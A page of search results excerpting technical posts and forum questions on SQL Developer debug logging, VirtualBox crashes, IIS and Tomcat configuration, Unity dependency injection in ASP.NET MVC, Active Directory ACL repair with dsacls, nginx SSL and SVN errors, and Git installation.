Search Results

Search found 24720 results on 989 pages for 'path info'.

Page 612/989 | < Previous Page | 608 609 610 611 612 613 614 615 616 617 618 619  | Next Page >

  • Using DEBUG Mode in Oracle SQL Developer to Log SQL

    - by thatjeffsmith
    Curious how we’re getting the data you see in SQL Developer when you click on something? While many of the dialogs provide a ‘SQL’ panel that shows you the SQL ABOUT to be generated, I’d rather see the SQL AS it’s executed. True, you could set a TRACE or fire up a Monitor Sessions report, but both of those solutions leave me hungry for more. Did you know that SQL Developer has a ‘debug’ mode? It slows the tool down a bit and spits out a lot of information you don’t care about, but it ALSO shows you ALL the SQL that is sent to the database, as you click around the tool! See ALL the SQL that SQL Developer sends to the database on your behalf Enable DEBUG Mode When you see the splash screen as SQL Developer fires up, frantically hit Up, Up, Down, Down, Left, Right, Left, Right, B, A, SELECT, Start. Wait, wrong game. No, all you need to do is go to your SQL Developer directory and navigate down to the ‘bin’ directory. In that directory, find the ‘sqldeveloper.conf’ file. Install Directory - sqldeveloper - bin - sqldeveloper.conf Open it with a text editor. Find this line IncludeConfFile sqldeveloper-nondebug.conf And replace it with this line IncludeConfFile sqldeveloper-debug.conf Save the file. Start up SQL Developer. Observe the Logging Page – Log Panel for the SQL There’s going to be more than just SQL here. You’ll actually see a LOT of other information. If you’re having general problems with the tool and you want to see the nitty-gritty of what’s going on, then this is a good place to satisfy your curiosity and might help us diagnose your issue if you post to the forums or open a ticket with My Oracle Support. You’ll find ‘INFO’ entries that look a little something like this - This is the query used to populate your Tables list in the connection tree. You can double-click on the sql text and get a pop-up window that’s much easier to read. See all that typing we’re saving you? I don’t recommend running in DEBUG mode all the time. Capturing this information and displaying it is more expensive than not doing so. And it provides a lot of information you don’t normally need to see. But when you DO want to know what’s going on and why, this is an excellent way of getting that information. When you’re ready to go back to ‘normal’ mode, just close SQL Developer, go back to your .conf file, and add the ‘nondebug’ bit back.

    Read the article

  • [Visual Studio Extension Of The Day] Test Scribe for Visual Studio Ultimate 2010 and Test Professional 2010

    - by Hosam Kamel
      Test Scribe is a documentation power tool designed to construct documents directly from the TFS for test plan and test run artifacts for the purpose of discussion, reporting etc... . Known Issues/Limitations Customizing the generated report by changing the template, adding comments, including attachments etc… is not supported While opening a test plan summary document in  Office 2007, if you get the warning: “The file Test Plan Summary cannot be opened because there are problems with the contents” (with Details: ‘The file is corrupt and cannot be opened’), click ‘OK’. Then, click ‘Yes’ to recover the contents of the document. This will then open the document in Office 2007. The same problem is not found in Office 2010. Generated documents are stored by default in the “My documents” folder. The output path of the generated report cannot be modified. Exporting word documents for individual test suites or test cases in a test plan is not supported. Download it from Visual Studio Extension Manager Originally posted at "Hosam Kamel| Developer & Platform Evangelist" http://blogs.msdn.com/hkamel

    Read the article

  • Ubuntu 13.10 install ISO crashes on VirtualBox Mac 4.3

    - by John Allsup
    Does anybody know what to do about this? Machine is a 2008 Core 2 Duo iMac with 4GB RAM. (And 64bit Debian 7 boots OK, but I've not tried installing under the latest version of VirtualBox as I have just upgraded VBox today.) VirtualBox 4.3, upon trying to boot a machine with the Ubuntu 13.10 (64bit) iso (with the VM configured for Ubuntu 64bit) crashes, with the following information: Failed to open a session for the virtual machine Ubuntu64. The VM session was aborted. Result Code: NS_ERROR_FAILURE (0x80004005) Component: SessionMachine Interface: ISession {12f4dcdb-12b2-4ec1-b7cd-ddd9f6c5bf4d} === Head of crash dump is below Process: VirtualBoxVM [716] Path: /Applications/VirtualBox.app/Contents/MacOS/VirtualBoxVM Identifier: VirtualBoxVM Version: ??? (???) Code Type: X86 (Native) Parent Process: VBoxSVC [644] Date/Time: 2013-10-17 22:58:23.679 +0100 OS Version: Mac OS X 10.6.8 (10K549) Report Version: 6 Exception Type: EXC_BAD_ACCESS (SIGBUS) Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000040 Crashed Thread: 0 Dispatch queue: com.apple.main-thread Thread 0 Crashed: Dispatch queue: com.apple.main-thread 0 com.apple.CoreFoundation 0x92a25c03 CFSetApplyFunction + 83 1 com.apple.framework.IOKit 0x95557ad4 __IOHIDManagerInitialEnumCallback + 69 2 com.apple.CoreFoundation 0x92a2442b __CFRunLoopDoSources0 + 1563 3 com.apple.CoreFoundation 0x92a21eef __CFRunLoopRun + 1071 4 com.apple.CoreFoundation 0x92a213c4 CFRunLoopRunSpecific + 452 5 com.apple.CoreFoundation 0x92a211f1 CFRunLoopRunInMode + 97 6 com.apple.HIToolbox 0x98eb5e04 RunCurrentEventLoopInMode + 392 7 com.apple.HIToolbox 0x98eb5af5 ReceiveNextEventCommon + 158 8 com.apple.HIToolbox 0x98eb5a3e BlockUntilNextEventMatchingListInMode + 81 9 com.apple.AppKit 0x9971b595 _DPSNextEvent + 847 10 com.apple.AppKit 0x9971add6 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 156 11 com.apple.AppKit 0x996dd1f3 -[NSApplication run] + 821 12 QtGuiVBox 0x019f19e1 QEventDispatcherMac::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 1505 13 QtCoreVBox 0x018083b1 QEventLoop::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) + 65 14 QtCoreVBox 0x018086fa QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) + 170 15 QtGuiVBox 0x01eea9e5 QDialog::exec() + 261 16 VirtualBox.dylib 0x011234b8 TrustedMain + 1108104 17 VirtualBox.dylib 0x01126d68 TrustedMain + 1122616 18 VirtualBox.dylib 0x010fac19 TrustedMain + 942057 19 VirtualBox.dylib 0x010f9b3d TrustedMain + 937741 20 VirtualBox.dylib 0x010f81dd TrustedMain + 931245 21 VirtualBox.dylib 0x010f85b8 TrustedMain + 932232 22 VirtualBox.dylib 0x0109d4f8 TrustedMain + 559304 23 VirtualBox.dylib 0x0101521e TrustedMain + 1518 24 ...virtualbox.app.VirtualBoxVM 0x00002e7e start + 2766 25 ...virtualbox.app.VirtualBoxVM 0x000024b5 start + 261 26 ...virtualbox.app.VirtualBoxVM 0x000023e5 start + 53 ==== And please somebody fix the code so that you can just delimit large blocks of code at the start and the end without indenting every line manually by 4 spaces.

    Read the article

  • 401 - Unauthorized On Server 2008 R2 IIS 7.5

    - by mxmissile
    I have a web application deployed to Server 2008 IIS 7.5 box. From remote it gives this error: 401 - Unauthorized: Access is denied due to invalid credentials. (remote = desktops on the same LAN) Have tried several remote clients using different browsers, all the same result. (IE, FF, and Chrome) Hitting the application from the desktop of the server itself works flawlessly. The application is using Anonymous Authentication. The application is written in .NET 4.0 Asp.Net using the MVC framework. Sysinternals procmon returns these 2 results for each request: FAST IO DISALLOWED and PATH NOT FOUND. I have 2 other MVC apps running fine on the same server. I have checked the security on the folders and they all match. App runs fine on a Server 2008 IIS 7.0 box. Nothing shows up in the Event log on the server related to this. Pulling my hair out here, any troubleshooting tips?

    Read the article

  • Dependency Injection in ASP.NET MVC NerdDinner App using Unity 2.0

    - by shiju
    In my previous post Dependency Injection in ASP.NET MVC NerdDinner App using Ninject, we did dependency injection in NerdDinner application using Ninject. In this post, I demonstrate how to apply Dependency Injection in ASP.NET MVC NerdDinner App using Microsoft Unity Application Block (Unity) v 2.0.Unity 2.0Unity 2.0 is available on Codeplex at http://unity.codeplex.com . In earlier versions of Unity, the ObjectBuilder generic dependency injection mechanism, was distributed as a separate assembly, is now integrated with Unity core assembly. So you no longer need to reference the ObjectBuilder assembly in your applications. Two additional Built-In Lifetime Managers - HierarchicalifetimeManager and PerResolveLifetimeManager have been added to Unity 2.0.Dependency Injection in NerdDinner using UnityIn my Ninject post on NerdDinner, we have discussed the interfaces and concrete types of NerdDinner application and how to inject dependencies controller constructors. The following steps will configure Unity 2.0 to apply controller injection in NerdDinner application. Step 1 – Add reference for Unity Application BlockOpen the NerdDinner solution and add  reference to Microsoft.Practices.Unity.dll and Microsoft.Practices.Unity.Configuration.dllYou can download Unity from at http://unity.codeplex.com .Step 2 – Controller Factory for Unity The controller factory is responsible for creating controller instances.We extend the built in default controller factory with our own factory for working Unity with ASP.NET MVC. public class UnityControllerFactory : DefaultControllerFactory {     protected override IController GetControllerInstance(RequestContext reqContext, Type controllerType)     {         IController controller;         if (controllerType == null)             throw new HttpException(                     404, String.Format(                         "The controller for path '{0}' could not be found" +         "or it does not implement IController.",                     reqContext.HttpContext.Request.Path));           if (!typeof(IController).IsAssignableFrom(controllerType))             throw new ArgumentException(                     string.Format(                         "Type requested is not a controller: {0}",                         controllerType.Name),                         "controllerType");         try         {             controller = MvcUnityContainer.Container.Resolve(controllerType)                             as IController;         }         catch (Exception ex)         {             throw new InvalidOperationException(String.Format(                                     "Error resolving controller {0}",                                     controllerType.Name), ex);         }         return controller;     }   }   public static class MvcUnityContainer {     public static IUnityContainer Container { get; set; } }  Step 3 – Register Types and Set Controller Factory private void ConfigureUnity() {     //Create UnityContainer               IUnityContainer container = new UnityContainer()     .RegisterType<IFormsAuthentication, FormsAuthenticationService>()     .RegisterType<IMembershipService, AccountMembershipService>()     .RegisterInstance<MembershipProvider>(Membership.Provider)     .RegisterType<IDinnerRepository, DinnerRepository>();     //Set container for Controller Factory     MvcUnityContainer.Container = container;     //Set Controller Factory as UnityControllerFactory     ControllerBuilder.Current.SetControllerFactory(                         typeof(UnityControllerFactory));            } Unity 2.0 provides a fluent interface for type configuration. Now you can call all the methods in a single statement.The above Unity configuration specified in the ConfigureUnity method tells that, to inject instance of DinnerRepositiry when there is a request for IDinnerRepositiry and  inject instance of FormsAuthenticationService when there is a request for IFormsAuthentication and inject instance of AccountMembershipService when there is a request for IMembershipService. The AccountMembershipService class has a dependency with ASP.NET Membership provider. So we configure that inject the instance of Membership Provider.After the registering the types, we set UnityControllerFactory as the current controller factory. //Set container for Controller Factory MvcUnityContainer.Container = container; //Set Controller Factory as UnityControllerFactory ControllerBuilder.Current.SetControllerFactory(                     typeof(UnityControllerFactory)); When you register a type  by using the RegisterType method, the default behavior is for the container to use a transient lifetime manager. It creates a new instance of the registered, mapped, or requested type each time you call the Resolve or ResolveAll method or when the dependency mechanism injects instances into other classes. The following are the LifetimeManagers provided by Unity 2.0ContainerControlledLifetimeManager - Implements a singleton behavior for objects. The object is disposed of when you dispose of the container.ExternallyControlledLifetimeManager - Implements a singleton behavior but the container doesn't hold a reference to object which will be disposed of when out of scope.HierarchicalifetimeManager - Implements a singleton behavior for objects. However, child containers don't share instances with parents.PerResolveLifetimeManager - Implements a behavior similar to the transient lifetime manager except that instances are reused across build-ups of the object graph.PerThreadLifetimeManager - Implements a singleton behavior for objects but limited to the current thread.TransientLifetimeManager - Returns a new instance of the requested type for each call. (default behavior)We can also create custome lifetime manager for Unity container. The following code creating a custom lifetime manager to store container in the current HttpContext. public class HttpContextLifetimeManager<T> : LifetimeManager, IDisposable {     public override object GetValue()     {         return HttpContext.Current.Items[typeof(T).AssemblyQualifiedName];     }     public override void RemoveValue()     {         HttpContext.Current.Items.Remove(typeof(T).AssemblyQualifiedName);     }     public override void SetValue(object newValue)     {         HttpContext.Current.Items[typeof(T).AssemblyQualifiedName]             = newValue;     }     public void Dispose()     {         RemoveValue();     } }  Step 4 – Modify Global.asax.cs for configure Unity container In the Application_Start event, we call the ConfigureUnity method for configuring the Unity container and set controller factory as UnityControllerFactory void Application_Start() {     RegisterRoutes(RouteTable.Routes);       ViewEngines.Engines.Clear();     ViewEngines.Engines.Add(new MobileCapableWebFormViewEngine());     ConfigureUnity(); }Download CodeYou can download the modified NerdDinner code from http://nerddinneraddons.codeplex.com

    Read the article

  • Modifying AD Schema permissions from the command line

    - by Ryan Roussel
    Recently while making some changes for a client, I accidently dug myself into a pretty deep hole.  I was trying to explicitly deny a certain user from reading a few group policies including the Default Domain Policy.  When I went in to make the change I accidently denied Authenticated Users rather than the AD user object.  This of course made the GPO inaccessible to all users including any with domain admin rights.  The policy could no longer be modified in the GPMC and worse, changes could not be made through ADSIedit.   The errors I was getting from inside ADSIedit when trying to edit the container looked like this This object has one or more property sheets currently open. Invalid path to object The only solution was to strip Authenticated Users from the container ACL completely in the schema, then re-add it back with the default read and apply rights.  To perform this action, I used a command I had never used before:  DSALCS.exe  It’s part of the DSMOD group of tools.  Since this command interacts with the actual schema, you have to know the full LDAP container or object name.  In this case the GUID of the Default Domain Policy: {31B2F340-016D-11D2-945F-00C04FB984F9}   The actual commands I ran looked like this:   To display the current ACL of the container: c:\>dsacls “cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System, dc=domain,dc=com” /A To strip Authenticated Users from the ACL of the container: c:\>dsacls “cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=Policies,cn=System, dc=domain,dc=com” /R “NT Authority\Authenticated Users”   For full reference of the DSACLS.EXE command visit: http://support.microsoft.com/kb/281146 Once the Authenticated Users was cleared from the ACL, I was able to use Group Policy Management Console to reassign the default permissions.

    Read the article

  • Tomcat6 Manager Webapp is 404 on apt-get install on Ubuntu 10.10

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works. Lists one Host name, localhost. cat /usr/share/tomcat6/conf/tomcat-users.xml <tomcat-users> <role rolename="admin"/> <role rolename="manager" /> <user username="tomcatuser" password="Password1" roles="admin,manager"/> </tomcat-users> cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" /> <role name="manager" /> <user name="manager" password="Password1" roles="manager" /> <user name="tomcatuser" password="Password1" roles="manager" /> Those two files are the only documentation I've seen on how to setup the Manager webapp, and they seem to be compliant with the requirements.

    Read the article

  • Tomcat6 Manager Webapp is 404 on apt-get install on Ubuntu 10.10

    - by Noel
    http://localhost:8080/manager/html gives a 404 error on apt-get install of tomcat6 (6.0.28 on JVM 1.6.0_20-b20 on 2.6.35-27-generic amd64). http://localhost:8080/host-manager/html works. Lists one Host name, localhost. Installed tomcat6-admin with apt-get. $ ls dpkg -l | grep -i tomcat6-admin ii tomcat6-admin 6.0.28-2ubuntu1.1 Servlet and JSP engine -- admin web applications $ cat /usr/share/tomcat6/conf/tomcat-users.xml <tomcat-users> <role rolename="admin"/> <role rolename="manager" /> <user username="tomcatuser" password="Password1" roles="admin,manager"/> </tomcat-users> $ cat /usr/share/tomcat6/conf/Catalina/localhost/manager.xml <Context path="/manager" docBase="/usr/share/tomcat6-admin/manager" antiResourceLocking="false" privileged="true" /> <role name="manager" /> <user name="manager" password="Password1" roles="manager" /> <user name="tomcatuser" password="Password1" roles="manager" /> Those two files are the only documentation I've seen on how to setup the Manager webapp, and they seem to be compliant with the requirements.

    Read the article

  • Nginx ssl - SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line

    - by Alex
    I am trying to enable ssl on a server using a certificate from 123-reg but I keep getting this error: nginx: [emerg] SSL_CTX_use_certificate_chain_file("/opt/nginx/conf/cleantechlms.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140DC009:SSL routines:SSL_CTX_use_certificate_chain_file:PEM lib) This is my nginx config: server { listen 443; server_name a-fake-url.com; root /file/path/public; passenger_enabled on; ssl on; ssl_certificate /opt/nginx/conf/cleantechlms.crt; ssl_certificate_key /opt/nginx/conf/cleantechlms.key; } I have tried setting my crt and key to full file permissions but there is no difference. My crt file is the crt I was issued concatenated with the ca crt. Update I have tried copying both the keys in sperate files and then running 'cat mykey.crt ca.cert' Also I tried manually copying the keys into the same file. Any ideas?

    Read the article

  • When should I use Areas in TFS instead of Team Projects

    - by Martin Hinshelwood
    Well, it depends…. If you are a small company that creates a finite number of internal projects then you will find it easier to create a single project for each of your products and have TFS do the heavy lifting with reporting, SharePoint sites and Version Control. But what if you are not… Update 9th March 2010 Michael Fourie gave me some feedback which I have integrated. Ed Blankenship via @edblankenship offered encouragement and a nice quote. Ewald Hofman gave me a couple of Cons, and maybe a few more soon. Ewald’s company, Avanade, currently uses Areas, but it looks like the manual management is getting too much and the project is getting cluttered. What if you are likely to have hundreds of projects, possibly with a multitude of internal and external projects? You might have 1 project for a customer or 10. This is the situation that most consultancies find themselves in and thus they need a more sustainable and maintainable option. What I am advocating is that we should have 1 “Team Project” per customer, and use areas to create “sub projects” within that single “Team Project”. "What you describe is what we generally do internally and what we recommend. We make very heavy use of area path to categorize the work within a larger project." - Brian Harry, Microsoft Technical Fellow & Product Unit Manager for Team Foundation Server   "We tend to use areas to segregate multiple projects in the same team project and it works well." - Tiago Pascoal, Visual Studio ALM MVP   "In general, I believe this approach provides consistency [to multi-product engagements] and lowers the administration and maintenance costs. All good." - Michael Fourie, Visual Studio ALM MVP   “@MrHinsh BTW, I'm very much a fan of very large, if not huge, team projects in TFS. Just FYI :) Use Areas & Iterations.” Ed Blankenship, Visual Studio ALM MVP   This would mean that SSW would have a single Team Project called “SSW” that contains all of our internal projects and consequently all of the Areas and Iteration move down one hierarchy to accommodate this. Where we would have had “\SSW\Sprint 1” we now have “\SSW\SqlDeploy\Sprint1” with “SqlDeploy” being our internal project. At the moment SSW has over 70 internal projects and more than 170 total projects in TFS. This method has long term benefits that help to simplify the support model for companies that often have limited internal support time and many projects. But, there are implications as TFS does not provide this model “out-of-the-box”. These implications stretch across Areas, Iterations, Queries, Project Portal and Version Control. Michael made a good comment, he said: I agree with your approach, assuming that in a multi-product engagement with a client, they are happy to adopt the same process template across all products. If they are not, then it’ll either be easy to convince them or there is a valid reason for having a different template - Michael Fourie, Visual Studio ALM MVP   At SSW we have a standard template that we use and this is applied across the board, to all of our projects. We even apply any changes to the core process template to all of our existing projects as well. If you have multiple projects for the same clients on multiple templates and you want to keep it that way, then this approach will not work for you. However, if you want to standardise as we have at SSW then this approach may benefit you as well. Implications around Areas Areas should be used for topological classification/isolation of work items. You can think of this as architecture areas, organisational areas or even the main features of your application. In our scenario there is an additional top level item that represents the Project / Product that we want to chop our Team Project into. Figure: Creating a sub area to represent a product/project is easy. <teamproject> <teamproject>\<Functional Area/module whatever> Becomes: <teamproject> <teamproject>\<ProjectName>\ <teamproject>\<ProjectName>\<Functional Area/module whatever> Implications around Iterations Iterations should be used for chronological classification/isolation of work items. This could include isolated time boxes, milestones or release timelines and really depends on the logical flow of your project or projects. Due to the new level in Area we need to add the same level to Iteration. This is primarily because it is unlikely that the sprints in each of your projects/products will start and end at the same time. This is just a reality of managing multiple projects. Figure: Adding the same Area value to Iteration as the top level item adds flexibility to Iteration. <teamproject>\Sprint 1 Or <teamproject>\Release 1\Sprint 1 Becomes: <teamproject>\<ProjectName>\Sprint 1 Or <teamproject>\<ProjectName>\Release 1\Sprint 1 Implications around Queries Queries are used to filter your work items based on a specified level of granularity. There are a number of queries that are built into a project created using the MSF Agile 5.0 template, but we now have multiple projects and it would be a pain to have to edit all of the work items every time we changed project, and that would only allow one team to work on one project at a time.   Figure: The Queries that are created in a normal MSF Agile 5.0 project do not quite suit our new needs. In order for project contributors to be able to query based on their project we need a couple of things. The first thing I did was to create an “_Area Template” folder that has a copy of the project layout with all the queries setup to filter based on the “_Area Template” Area and the “_Sprint template” you can see in the Area and Iteration views. Figure: The template is currently easily drag and drop, but you then need to edit the queries to point at the right Area and Iteration. This needs a tool. I then created an “Areas” folder to hold all of the area specific queries. So, when you go to create a new TFS Sub-Project you just drag “_Area Template” while holding “Ctrl” and drop it onto “Areas”. There is a little setup here. That said I managed it in around 10 minutes which is not so bad, and I can imagine it being quite easy to build a tool to create these queries Figure: These new queries can be configured in around 10 minutes, which includes setting up the Area and Iteration as well. Version Control What about your source code? Well, that is the easiest of the lot. Just create a sub folder for each of your projects/products.   Figure: Creating sub folders in source control is easy as “Right click | Create new folder”. <teamproject>\DEV\Main\ Becomes: <teamproject>\<ProjectName>\DEV\Main\ Conclusion I think it is up to each company to make a call on how you want to configure your Team Projects and it depends completely on how many projects/products you are going to have for each customer including yourself. If we decide to utilise this route it will require some configuration to get our 170+ projects into this format, and I will probably be writing some tools to help. Pros You only have one project to upgrade when a process template changes – After going through an upgrade of over 170 project prior to the changes in the RC I can tell you that that many projects is no fun. Standardises your Process Template – You will always have the same Process implementation across projects/products without exception You get tighter control over the permissions – Yes, you can do this on a standard Team Project, but it gets a lot easier with practice. You can “move” work items from one “product” to another – Have we not always wanted to do that. You can rename your projects – Wahoo: everyone wants to do this, now you can. One set of Reporting Services reports to manage – You set an area and iteration to run reports anyway, so you may as well set both. Simplified Check-In Policies– There is only one set of check-in policies per client. This simplifies administration of policies. Simplified Alerts – As alerts are applied across multiple projects this simplifies your alert rules as per client. Cons All of these cons could be mitigated by a custom tool that helps automate creation of “Sub-projects” within Team Projects. This custom tool could create areas, Iteration, permissions, SharePoint and queries. It just does not exist yet :) You need to configure the Areas and Iterations You need to configure the permissions You may need to configure sub sites for SharePoint (depends on your requirement) – If you have two projects/products in the same Team Project then you will not see the burn down for each one out-of-the-box, but rather a cumulative for the Team Project. This is not really that much of a problem as you would have to configure your burndown graphs for your current iteration anyway. note: When you create a sub site to a TFS linked portal it will inherit the settings of its parent site :) This is fantastic as it means that you can easily create sub sites and then set the Area and Iteration path in each of the reports to be the correct one. Every team wants their own customization (via Ewald Hofman) - small teams of 2 persons against teams of 30 – or even outsourcing – need their own process, you cannot allow that because everybody gets the same work item types. note: Luckily at SSW this is not a problem as our template is standardised across all projects and customers. Large list of builds (via Ewald Hofman) – As the build list in Team Explorer is just a flat list it can get very cluttered. note: I would mitigate this by removing any build that has not been run in over 30 days. The build template and workflow will still be available in version control, but it will clean the list. Feedback Now that I have explained this method, what do you think? What other pros and cons can you see? What do you think of this approach? Will you be using it? What tools would you like to support you?   Technorati Tags: Visual Studio ALM,TFS Administration,TFS,Team Foundation Server,Project Planning,TFS Customisation

    Read the article

  • Using AuthzSVNAccessFile for controlling SVN Access produces HTTP 400 Bad Request

    - by meeper
    I have a new repository on an existing subversion server that requires us to perform path based authorization within the repository. I found that the AuthzSVNAccessFile directive in apache is directly responsible for allowing this functionality. After fixing several other problems such as AuthzSVNAccessFile preventing SVNListParentPath from operating properly, I am left with one single problem. I can checkout, I can update, I can commit, BUT I cannot execute an SVN COPY for performing branch/tagging operations. The moment I comment out the AuthzSVNAccessFile line in the Apache config everything works as expected except the obvious path authorizations. Versions: The server OS is Debian 6.0.7 (Squeeze) Apache 2.2.16-6+squeeze11 Server Subversion 1.6.12dfsg-7 Clients are running windows Clients tried are: TortoiseSVN 1.8.2 Build 24708 64bit SVN CLI Client 1.8.3 (r1516576) Authentication is performed via AD to a Windows 2003 domain and appears to be operating normally. I have stripped out all other configurations and repository setups to produce this single configuration that reproduces the problem. Apache Configuration: <VirtualHost *:443> ServerName svn-test.company.com ServerAlias /svn-test ServerAdmin [email protected] SSLEngine On SSLCertificateFile /etc/apache2/apache.pem ErrorLog /var/log/apache2/svn-test_error.log LogLevel warn CustomLog /var/log/apache2/svn-test_access.log combined ServerSignature On # Repository Access to all Repositories <Location "/"> DAV svn SVNParentPath /var/svn SVNListParentPath on AuthBasicProvider ldap AuthType Basic AuthzLDAPAuthoritative Off AuthName "Subversion Test Repository System" AuthLDAPURL "ldap://adserver.company.com:389/DC=corp,DC=company,DC=com?sAMAccountName?sub?(objectClass=*)" NONE AuthLDAPBindDN "CN=service_account,OU=ServiceIDs,OU=corp,OU=Delegated,DC=na,DC=corp,DC=company,DC=com" AuthLDAPBindPassword service_account_password Require valid-user SSLRequireSSL </Location> # <LocationMatch /.+> is a really dirty trick to make listing of repositories work # http://d.hatena.ne.jp/shimonoakio/20080130/1201686016 <LocationMatch /.+> AuthzSVNAccessFile /etc/apache2/svn_path_auth </LocationMatch> </VirtualHost> SVN Access File: [/] * = rw The repository used (AuthTestBasic) consists of the following directory structure and contains no externals (this is a literal listing, not an example): / /branches/ /tags/ /trunk/ /trunk/somefile.txt Tortoise produces the following error during a tag operation in it's tag result window: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request) The svn.exe CLI client produces the following error: C:\Users\e20epkt>svn copy https://servername/authtestbasic/trunk https://servername/authtestbasic/tags/tag1 -m "svn cli client" svn: E175002: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request) The Apache error log has nothing in it, however the apache access log has the following in it (IP addresses and usernames changed obviously): 10.1.2.100 - - [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 401 2595 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 996 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 884 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/trunk HTTP/1.1" 207 692 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/0/trunk HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 200 674 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 207 548 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags/tag1 HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "MKACTIVITY /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags HTTP/1.1" 207 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/vcc/default HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPPATCH /authtestbasic/!svn/wbl/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e/2 HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/ver/1/tags HTTP/1.1" 201 724 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "COPY /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 400 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "DELETE /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 204 1956 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" You'll see that the second to last line contains the COPY command with the HTTP 400 response, however, there doesn't appear to be any indication as to why. Please note that, while yes this is a test repository on a test server, I am experiencing this same issue in this test setup where I have eliminated all other possible causes (mixed repository configurations, externals, etc). I have also confirmed that all files for the repository (/var/svn/authtestbasic) are owned by the Apache user www-data.

    Read the article

  • Install Git under OSX Mavericks

    - by Jan Hancic
    I've just completed a fresh install of Mavericks. Then I went to git-scm.com and downloaded the Mac installer and installed Git from that. Now whenever I go into the terminal and type git I get this: xcode-select: note: no developer tools were found at '/Applications/Xcode.app', requesting install. Choose an option in the dialog to download the command line developer tools. I also this dialog: The git installer installed git into /usr/local/git/bin and I've added this to my PATH but still no dice. What am I doing wrong here? I don't want to install xcode just so I can use git.

    Read the article

  • SQLBeat Podcast – Episode 5 – Kevin Kline Talks With Me About SQL, Professional Development and Book Writin’

    - by SQLBeat
